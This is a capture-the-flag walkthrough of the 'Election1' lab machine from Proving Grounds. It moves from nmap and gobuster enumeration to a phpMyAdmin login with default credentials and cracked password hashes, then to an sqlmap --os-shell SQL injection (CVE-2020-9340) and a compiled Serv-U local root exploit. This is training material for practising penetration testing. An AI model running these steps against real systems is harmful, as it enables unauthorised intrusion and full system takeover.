In this walk through, we will be going through the Election1 room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of exploitation of two CVE’s – one for initial access and other for privilege escalation. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Election1 |
IPaddress | 192.168.159.211 |
Difficulty | Intermediate |
OS | Linux |
Description | Election is an intermediate level machine which leverages the exploitation of two CVE’s – one for initial access and other for privilege escalation. |
Enumeration:
- I started off with my regular aggressive nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP).
$ sudo nmap -A 192.168.159.211 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-05 11:39 IST Nmap scan report for 192.168.159.211 Host is up (0.19s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA) | 256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA) |_ 256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519) | vulners: | cpe:/a:openbsd:openssh:7.6p1: | EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT* | EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT* | EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT* | EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT* | CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111 | 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328*EXPLOIT* | 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009*EXPLOIT* | SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT* | PRION:CVE-2018-15919 5.0 https://vulners.com/prion/PRION:CVE-2018-15919 | PRION:CVE-2018-15473 5.0 https://vulners.com/prion/PRION:CVE-2018-15473 | PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT* | EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT* | EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT* | EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT* | EDB-ID:45233 5.0 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT* | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919 | CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473 | 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730*EXPLOIT* | PRION:CVE-2019-16905 4.4 https://vulners.com/prion/PRION:CVE-2019-16905 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | PRION:CVE-2019-6110 4.0 https://vulners.com/prion/PRION:CVE-2019-6110 | PRION:CVE-2019-6109 4.0 https://vulners.com/prion/PRION:CVE-2019-6109 | CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110 | CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109 | PRION:CVE-2019-6111 2.6 https://vulners.com/prion/PRION:CVE-2019-6111 | PRION:CVE-2018-20685 2.6 https://vulners.com/prion/PRION:CVE-2018-20685 | CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685 | PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT* | MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 0.0 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT* |_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937*EXPLOIT* 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works | vulners: | cpe:/a:apache:http_server:2.4.29: | CVE-2019-9517 7.8 https://vulners.com/cve/CVE-2019-9517 | PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT* | EDB-ID:51193 7.5 https://vulners.com/exploitdb/EDB-ID:51193 *EXPLOIT* | CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813 | CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943 | CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720 | CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790 | CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275 | CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691 | CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123 | CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225 | CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386 | 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT* | EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT* | EDB-ID:46676 7.2 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT* | CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211 | 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502*EXPLOIT* | FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT* | CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438 | CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452 | CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 | CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 | CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224 | AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT* | 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT* | 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT* | 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT* | 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT* | 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT* | OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122 | CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615 | CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224 | CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082 | CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217 | CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721 | CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 | CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098 | 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577*EXPLOIT* | CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760 | OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802 | OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622 | F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT* | E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT* | DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT* | CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436 | CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556 | CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404 | CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614 | CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377 | CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719 | CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798 | CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193 | CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690 | CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 | CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 | CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567 | CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081 | CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220 | CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196 | CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 | CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189 | CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333 | CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303 | CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 | CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001 | CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320 | CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558 | CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122 | CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584 | CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582 | CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223 | C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT* | BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT* | B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT* | A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT* | 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT* | 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT* | 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT* | CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993 | CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092 | CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302 | CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301 | CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763 | 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D *EXPLOIT* | 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422*EXPLOIT* | 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575*EXPLOIT* | CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 |_ PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT* No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=1/5%OT=22%CT=1%CU=34629%PV=Y%DS=4%DC=T%G=Y%TM=65979D21 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%II=I%TS=A)OPS(O1=M5 OS:4EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O OS:6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D OS:F=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0 OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=D34 OS:E%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 587/tcp) HOP RTT ADDRESS 1 192.16 ms 192.168.45.1 2 192.12 ms 192.168.45.254 3 192.19 ms 192.168.251.1 4 192.25 ms 192.168.159.211 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 36.21 seconds
- Enumerated the web server running on port 80 and found a Default Apache2 Page.
Directory Bruteforcing
- Fired gobuster on the web server to reveal some hidden directories and found two interesting ones – phpmyadmin and robots.txt
$ gobuster dir -u http://192.168.159.211/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x php,txt,html =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.159.211/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: txt,html,php [+] Timeout: 10s =============================================================== 2024/01/05 11:49:22 Starting gobuster in directory enumeration mode =============================================================== /javascript (Status: 301) [Size: 323] [--> http://192.168.159.211/javascript/] /index.html (Status: 200) [Size: 10918] /phpmyadmin (Status: 301) [Size: 323] [--> http://192.168.159.211/phpmyadmin/] /robots.txt (Status: 200) [Size: 30]
- I first check the phpmyadmin page and it was accessible to us. I tried the default username and password – root:password but access was denied. So, i left it there only.
- Next, i checked the robots.txt file which reveals an interesting directory called election. As it is same as the name of the box, so this is worth checking.
Enumerating Election System
- The directory reveals an Web based Election Management System. On the front page there was a candidates section which shows the candidate name and username.
- Along with that, we can also type Voter’s code to vote for the candidate however it first needs registration from the admin section.
- I performed another directory bruteforce attack using gobuster but this time on /election directory and it reveals the required admin backend directory which was /admin only. LOL!
$ gobuster dir -u http://192.168.171.211/election/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.171.211/election/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2024/01/05 13:22:04 Starting gobuster in directory enumeration mode =============================================================== /media (Status: 301) [Size: 327] [--> http://192.168.171.211/election/media/] /js (Status: 301) [Size: 324] [--> http://192.168.171.211/election/js/] /admin (Status: 301) [Size: 327] [--> http://192.168.171.211/election/admin/] /themes (Status: 301) [Size: 328] [--> http://192.168.171.211/election/themes/] /lib (Status: 301) [Size: 325] [--> http://192.168.171.211/election/lib/] /data (Status: 301) [Size: 326] [--> http://192.168.171.211/election/data/] /languages (Status: 301) [Size: 331] [--> http://192.168.171.211/election/languages/]
- Navigated to the found directory, reveals a page which required an alredy existing admin ID to proceed further. I tried various inputs like 1, admin1, Love, 2, etc but all failed. Next, i tried to perform an SQL authentication bypass and changed some parameters to bypass the restriction using Burpsuite but all failed.
Enumerating phpMyAdmin
- I moved back to enumerate the phpMyAdmin login panel. This time tried bunch of common username/password combo and got a postive on root:toor.
- Once inside, looked at all the databases thoroughly, found some hashed passwords too. Cracked them and saved them if they might required further.
- Now at this point, i was trying to get a reverse shell via PhpMyAdmin but that technique failed. Sometimes, we do not see what’s in front of us and try more complex methods to get in where in reality the answer was in front of us, this whole time. In one of the databases named “tb_panitia”, i got the hash password of user “Love”
Love: bb113886b0513a9d882e3caa5cd73314
Love: Zxc123!@#
- Cracked it using hashes.com and got the password.
- With the found Admin ID and password, got into the election backend dashboard.
Initial Access:
- Upon checking the system info of the running application, came to know that it is running on Patch Update “2”, found a number of exploits one but the right one was the SQL Injection one with CVE-2020–9340.
Exploiting CVE-2020–9340
- In order to exploit the SQL Injection in the candidate registration section of the application. We first have to create a demo user.
- Next, intercept the request of editing the user via Burpsuite and analyzed the response by changing the number in the “id” parameter. When i keep the id as “77” for my demo user, i got a positive response back with the details of the user in JSON format.
- I changed the ID to something random and got a 404 response.
- Used a common SQL Injection payload on the ID parameter and it gives me a positive response confirming it is vulnerable to SQL injection.
# ID value may differ as per your user. 77 AND 1=1
- Now we will be leveraging sqlmap to get a command shell on the target using SQL injection. For that, save the Burpsuite request to a file named request.txt and trigger sqlmap on it. After a while, we will get a shell prompt.
sqlmap -r request.txt --level=5 --risk=3 --os-shell -p id
- Upon checking the system.log file in the /admin/logs directory reveals the password of user Love.
cat /var/www/html/election/admin/logs/system.log
- Got our initial foothold on the target via SSH using the found credentials.
ssh [email protected] P@$$w0rd@123
- Captured the user and local flag.
Privilege Escalation:
- Next, i uploaded Linpeas on the target to get some priv-esc attack vectors and got an unusual binary called Serv-U which was vulnerable to CVE-2019-12181. We can also find this binary with the below command.
find / -perm -u=s -type f 2>/dev/null
- Checked for the known exploits for Serv-U and it confirms a Local Privilege escalation exploit.
searchsploit Serv-U
- Copied the exploit to my working directory and then uploaded it to the target.
searchsploit -m inux/local/47009.c
- Compiled the exploit and fired it which grants me root access on the target.
gcc 47009.c -o exploit ./exploit
- Finally, captured the proof.txt flag and completed the challenge.
Also Read: PG – DriftingBlues6
Conclusion:
So that was “Election1” for you. We started off with a regular nmap scan and only two ports opened – 22 (SSH) and 80 (HTTP). Enumerated the web server on port 80 and found a Election Management System. Further enumeration reveals phpmyadmin installation. Tried bunch of common username and password combinations and successfully got in using root:toor. Next, gathered the hashed password from the DB of user Love and then cracked it using hashes.com. With the found password, logged into the Election Management System. Enumerated the version running on it and found out that it is vulnerable to CVE-2020–9340. Used the same to get the initial access on the target. For privilege escalation, used the Serv-U Local Privilege Escalation exploit to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.